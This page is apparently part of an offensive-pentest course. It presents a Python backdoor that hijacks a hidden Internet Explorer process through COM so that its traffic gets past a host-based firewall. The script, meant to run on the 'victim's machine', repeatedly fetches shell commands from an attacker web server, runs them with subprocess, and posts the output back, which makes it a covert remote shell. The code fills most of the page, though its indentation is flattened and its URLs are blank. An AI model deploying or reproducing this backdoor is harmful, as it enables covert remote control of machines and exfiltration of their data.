Hickjack the Internet Explorer process to bypass an host-based firewall
From course: Python For Offensive PenTest: A Complete Practical Course.
General index of the course
- Gaining persistence shells (TCP + HTTP):
- Advanced scriptable shells:
- Techniques for bypassing filters:
- Malware and crytography:
- Password Hickjacking:
- Privilege escalation:
For our script to bypass a host-based firewall (based on an ACL), we will hickjack the Internet Explorer process to conceal our traffick and bypass it.
Client side
Make sure that the victim machine (a windows 10) has installed these two python libraries: pypiwin32 and pywin32.
To be run on our victim's machine.
| # Python For Offensive PenTest: A Complete Practical Course - All rights reserved
# Follow me on LinkedIn https://jo.linkedin.com/in/python2
from win32com.client import Dispatch
from time import sleep
import subprocess
ie = Dispatch("InternetExplorer.Application") # Create browser instance.
ie.Visible = 0 # Make it invisible [ run in background ] (1= visible)
# Paramaeters for POST
dURL = ""
Flags = 0
TargetFrame = 0
while True:
ie.Navigate("") # Navigate to our kali web server (the attacker machine) to grab the hacker commands
while ie.ReadyState != 4: # Wait for browser to finish loading.
command = ie.Document.body.innerHTML
command = command.encode() # encode the command
if 'terminate' in command.decode():
ie.Quit() # quit the IE and end up the process
CMD = subprocess.Popen(command.decode(), shell=True, stdin=subprocess.PIPE, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
Data = CMD.stdout.read()
PostData = memoryview( Data ) # in order to submit or post data using COM technique , it requires to buffer the data first using memoryview
ie.Navigate(dURL, Flags, TargetFrame, PostData) # we post the comamnd execution result along with the post parameters which we defined eariler..
Last update: 2024-10-24
Created: April 10, 2023 16:52:50